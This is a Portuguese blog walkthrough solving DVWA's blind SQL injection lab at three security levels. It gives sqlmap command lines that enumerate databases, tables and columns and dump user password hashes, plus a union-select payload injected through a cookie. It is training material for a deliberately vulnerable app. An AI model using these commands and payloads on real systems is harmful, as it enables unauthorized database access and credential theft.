DVWA Solution — SQL Injection (Blind) + SQLMAP

Rafael Renovaci
3 min readMay 12, 2019

--

Low

Colocando o ID 5 por exemplo estamos testando se os users existem na base.

Utilizando o burp para analisar o GET HTTP.

O que é o SQLMAP?

O SQLMAP é uma ferramenta de injeção SQL desenvolvida em Python, seu objetivo é detectar e explorar vulnerabilidades de injeção SQL em aplicações ou sites web, uma vez que se detecta uma ou mais injeções de SQL em um alvo, o usuário pode escolher entre uma variedade de opções que o SQLMAP disponibiliza para explorar os dados armazenados dentro do banco de dados deste sistema ou site, tais como, extrair a lista de usuários, senhas, privilégios, tabelas e muito mais..

Vamos inserir o get capturado no sqlmap e analisar o processo. A variável a ser verificada é id. Se a vulnerabilidade de injeção de SQL for encontrada nessa variável, sqlmap sera capaz de visualizar o parametro que o banco de dados usa para selecionar os dados e tambem ver as bases de dados.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.189.246/DVWA/vulnerabilities/sqli_blind/?id=5&Submit=Submit" -p id

Vamos adicionar o parametro --dbs conseguimos ver o nome da base de dados.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit" -p id --dbs

Vamos adicionar o parametro -D selecionando a base encontrada e depois — tables conseguimos ver as tabelas.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit" -p id -D dvwa --tables

Vamos adicionar o parametro -T users — columns para vermos cada campo da tabela de usuários.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit" -p id -D dvwa -T users --columns

Vamos adicionar o parametro -C user,password — dump para conseguirmos dar um DUMP total da base de dados. O SQLMAP ainda te da a opção de criar um arquivo com os hashes do dump, ainda usar um “dictionary-based attack” para o crack das senhas.

sqlmap --cookie="PHPSESSID=lrn5egdl79ee0hjqtn0g33p4v5; security=low" -u "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit" -p id -D dvwa -T users -C user,password --dump

Medium

No nível medium passam a entrada do usuário através do método POST.

Mesmo no nível médio, a variável id é detectada e vulnerável a injeção SQL. Todos os itens do do nivel low se aplicação e funcionam.

High

Ao contrário do capítulo anterior, desta vez eu escrevi um cookie.

Você pode ver os cookies usando EditThisCookie. Voce pode substituir o ID pelo SQL.

0‘ union select 1,2#

Você pode também utilizar o Burp e mudar o ID do cookie.

Atualizando a pagina você obtêm.

--

--